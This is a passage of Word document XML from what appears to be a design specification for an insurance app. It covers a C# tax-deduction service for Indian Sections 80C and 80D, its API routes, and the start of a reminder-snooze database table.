          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public List&lt;TaxLineItemDto&gt; LineItems { get; set; } = new();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public List&lt;string&gt; Optimizations     { get; set; } = new();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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public class TaxLineItemDto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string PolicyNumber  { get; set; } = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string PolicyType    { get; set; } = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string HolderName    { get; set; } = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public decimal Premium      { get; set; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string Section       { get; set; } = "";  // "80C", "80D", "10(10D)"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public decimal EligibleAmount { get; set; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.2  New Service — TaxIntelligenceService.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public class TaxIntelligenceService : ITaxIntelligenceService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public async Task&lt;TaxSummaryDto&gt; GetCurrentFYTaxBenefitsAsync(string[] members)</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var policies = await GetActivePoliciesForMembers(members);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var dto      = new TaxSummaryDto();</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 Section 80C — Life insurance premiums</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var lifePolicies = policies.Where(p =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            p.PolicyType?.Name.Contains("Life", StringComparison.OrdinalIgnoreCase) == true ||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            p.PolicyType?.Name.Contains("ULIP", StringComparison.OrdinalIgnoreCase) == true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var lifePremSum = lifePolicies.Sum(p =&gt; p.PremiumAmount);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        dto.Section80CDeduction = Math.Min(lifePremSum, 150_000m);</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 Section 80D — Health insurance premiums</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var healthPolicies = policies.Where(p =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            p.PolicyType?.Name.Contains("Health", StringComparison.OrdinalIgnoreCase) == true ||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            p.PolicyType?.Name.Contains("Medical", StringComparison.OrdinalIgnoreCase) == true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var healthPremSum = healthPolicies.Sum(p =&gt; p.PremiumAmount);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        dto.Section80DDeduction = Math.Min(healthPremSum, 25_000m); // 50K for senior citizens</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dto.TotalDeductions = dto.Section80CDeduction + dto.Section80DDeduction;</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 Estimated tax saving at 30% slab (simplified)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        dto.EstimatedTaxSaving = dto.TotalDeductions * 0.30m;</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 Optimization suggestions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (dto.Section80CDeduction &lt; 150_000m)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            dto.Optimizations.Add($"You have ₹{150_000m - dto.Section80CDeduction:N0} remaining 80C room. Consider adding a term life policy.");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (dto.Section80DDeduction &lt; 25_000m)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            dto.Optimizations.Add($"You have ₹{25_000m - dto.Section80DDeduction:N0} remaining 80D room. A health top-up plan could be beneficial.");</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return dto;</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.3  New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rPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/api/taxintelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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Returns current FY tax benefits summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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/api/taxintelligence/lineitems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="456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Returns per-policy tax breakdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Frontend: Add /tax-planner route in app.routes.ts. New Angular component: tax-planner.component.ts with a deduction breakdown table and optimization cards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec4-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3  Escalation Reminder System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.1  New Database Table — ReminderSnooze</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE ReminderSnoozes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    Id             INT           PRIMARY KEY IDENTITY,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    PolicyId       INT           NOT NULL REFERENCES Policies(Id),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    UserId         INT           NOT NULL REFERENCES Users(Id),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    SnoozeType     NVARCHAR(50)  NOT NULL,  -- "3days", "skip", "stop"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    SnoozeUntil    DATETIME2     NULL,       -- NULL for "stop" type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    CreatedAt      DATETIME2     NOT NULL DEFAULT GETUTCDATE()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
